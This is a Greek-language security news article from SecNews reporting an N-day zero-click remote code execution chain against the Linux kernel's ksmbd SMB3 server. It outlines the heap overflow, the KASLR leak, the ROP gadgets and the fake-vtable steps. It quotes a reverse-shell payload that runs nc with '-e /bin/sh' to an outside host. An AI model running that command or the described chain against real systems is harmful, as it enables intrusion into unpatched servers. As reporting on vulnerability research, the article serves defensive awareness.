ΑρχικήSecurityΕκμετάλλευση RCE zero-click στον πυρήνα Linux KSMBD

Εκμετάλλευση RCE zero-click στον πυρήνα Linux KSMBD

Μια εκμετάλλευση RCE zero-Click στον πυρήνα Linux KSMBD από ευπάθειες N-Day έχει εντοπιστεί, επιτυγχάνοντας απομακρυσμένη εκτέλεση κώδικα σε μια έκδοση Linux 6.1.45 δύο ετών, που τρέχει τον SMB3 daemon του πυρήνα, ksmbd.

Δείτε επίσης: Ευπάθεια στο Linux CUPS επιτρέπει απομακρυσμένο DoS

Linux KSMBD
Εκμετάλλευση RCE zero-click στον πυρήνα Linux KSMBD

Συνδυάζοντας δύο αυθεντικοποιημένες ευπάθειες N-day, CVE-2023-52440 και CVE-2023-4130, η εκμετάλλευση επιτυγχάνει μια μη αυθεντικοποιημένη υπερχείλιση SLUB και μια εκτός ορίων ανάγνωση heap, καταλήγοντας σε κλήση βοηθητικού προγράμματος σε λειτουργία χρήστη και αντίστροφο κέλυφος χωρίς καμία χειροκίνητη αλληλεπίδραση.

Το module ksmbd υλοποιεί έναν διακομιστή SMB3 στον πυρήνα για την εκφόρτωση κρίσιμων για την απόδοση εργασιών από το χώρο χρήστη. Η αυθεντικοποίηση NTLM με πρόκληση-απάντηση και η διαχείριση εκτεταμένων χαρακτηριστικών, εισήγαγαν δύο ευπάθειες υψηλής σοβαρότητας το 2023 και το 2024.

Η CVE-2023-52440 προκύπτει στη λειτουργία ksmbd_decode_ntlmssp_auth_blob(), όπου ένα μη ελεγχόμενο sess_key_len οδηγεί σε ελεγχόμενη υπερχείλιση SLUB κατά τη διάρκεια της cifs_arc4_crypt(). Ορίζοντας το session_key σε ένα blob που παρέχεται από τον επιτιθέμενο μέσω του ntlmChallengeResponse του Impacket, η εκμετάλλευση αποκτά ένα αξιόπιστο heap-overflow.

Δείτε ακόμα: ‘Sindoor Dropper’: Νέα malware καμπάνια στοχεύει Linux

Εκμετάλλευση RCE zero-click στον πυρήνα Linux KSMBD
Εκμετάλλευση RCE zero-click στον πυρήνα Linux KSMBD

Η CVE-2023-4130 βρίσκεται στη λειτουργία smb2_set_ea(), όπου η ακατάλληλη επικύρωση μήκους των καταχωρήσεων smb2_ea_info επιτρέπει μια αυθεντικοποιημένη εκτός ορίων ανάγνωση γειτονικών κομματιών heap σε ένα εκτεταμένο χαρακτηριστικό. Ο ερευνητής αξιοποίησε τις λειτουργίες setInfo() και queryInfo() του Impacket για να δημιουργήσει κακόβουλα buffers EA και να διαρρεύσει περιεχόμενα heap του πυρήνα, πραγματοποιώντας παράκαμψη KASLR και ακριβή διαμόρφωση heap.

Σε ένα δοκιμαστικό περιβάλλον με έναν πυρήνα Linux KSMBD και ενεργοποιημένες τις τυπικές μετριαστικές τεχνικές (SMEP, SMAP, KPTI, KASLR, ενισχυμένο SLUB), η εκμετάλλευση ξεκινά με την εκτόξευση πολλαπλών συνδέσεων TCP για την κατανομή ζευγών αντικειμένων ksmbd_conn (kmalloc-1k) και ksmbd_session (kmalloc-512). Ένας βρόχος “spray, leak, retry” εξασφαλίζει μια έγκυρη διαρροή συνεδρίας, ενώ ένα μοτίβο “overflow, oracle, retry” απομονώνει τη σύνδεση που υπερχείλισε.

Με την κατάχρηση της υπερχείλισης SLUB, ο επιτιθέμενος διαφθείρει τον δείκτη Preauth_HashValue σε ένα ksmbd_session, μετατρέποντάς τον σε αυθαίρετη απελευθέρωση στο kmalloc-1k. Επακόλουθες διαρροές βάσει EA εντοπίζουν ένα αντικείμενο ksmbd_conn στόχο, αποκαλύπτοντας δείκτες πυρήνα και υπολογίζοντας τη βάση KASLR. Με ακριβείς μετατοπίσεις, μια δεύτερη υπερχείλιση SLUB ενεργοποιεί μια αυθαίρετη απελευθέρωση και επανακατανομή ενός πλαστού αντικειμένου vtable.

Ο διαφθαρμένος δείκτης local_nls σε ksmbd_conn αντικαθίσταται για να δείχνει σε ένα ψεύτικο vtable που περιέχει ROP gadgets: pop rdi; ret, pop rsi; ret, pop rdx; ret, pop rcx; ret, και μια leave; ret στοίβα pivot. Το τελικό φορτίο καλεί το call_usermodehelper(“/usr/bin/nc.traditional”, “-e”, “/bin/sh”, “ctfi.ng”, “16549”) ακολουθούμενο από msleep() για να παγώσει το νήμα του πυρήνα, δημιουργώντας ένα αντίστροφο κέλυφος στη θύρα 16549.

Δείτε επίσης: Το Kali Linux εκτελείται πλέον σε Apple containers σε macOS

Εκμετάλλευση RCE zero-click στον πυρήνα Linux KSMBD
Εκμετάλλευση RCE zero-click στον πυρήνα Linux KSMBD

Παρόλο που το ksmbd βλέπει περιορισμένη ανάπτυξη στην παραγωγή, αυτή η αλυσίδα εκμετάλλευσης υπογραμμίζει την επεκτεινόμενη επιφάνεια επίθεσης του πυρήνα καθώς τα modules του χώρου χρήστη μεταναστεύουν στον πυρήνα. Αυτή η έρευνα αποτελεί παράδειγμα της εξελισσόμενης πολυπλοκότητας της ανάπτυξης εκμεταλλεύσεων N-day και της κρίσιμης ανάγκης για αυστηρή διαχείριση ευπαθειών του πυρήνα.

Επιλογή της ομάδας

🔒 Προστατέψτε την ιδιωτικότητά σας με Proton VPN

Ελβετικό VPN από τους δημιουργούς του Proton Mail — αυστηρή πολιτική no-logs, ισχυρή κρυπτογράφηση και ενσωματωμένο NetShield που μπλοκάρει διαφημίσεις, trackers & malware.

  • ✔ No-logs, με έδρα την Ελβετία (εκτός 14-Eyes)
  • ✔ NetShield: φραγή διαφημίσεων, trackers & κακόβουλων domains
  • ✔ Καλύπτει όλες τις συσκευές — δωρεάν έκδοση διαθέσιμη
Δοκιμάστε δωρεάν το Proton VPN — 30 ημέρες εγγύηση επιστροφής →

Ο σύνδεσμος είναι συνεργατικός (affiliate) — το SecNews ενδέχεται να λάβει προμήθεια χωρίς επιπλέον κόστος για εσάς. Δεν επηρεάζει την ανεξαρτησία της αρθρογραφίας μας.

📧
Εγγραφείτε στο Newsletter του SecNews

Τα σημαντικότερα νέα Ασφάλειας & Τεχνολογίας στο Inbox σας.

Absenta Mia
Absenta Miahttps://www.secnews.gr
Being your self, in a world that constantly tries to change you, is your greater achievement

ΑΝΑΖΗΤΗΣΗ

FOLLOW US

📧
Newsletter SecNews
Τα σημαντικότερα νέα Ασφάλειας & Τεχνολογίας στο inbox σας.

LIVE NEWS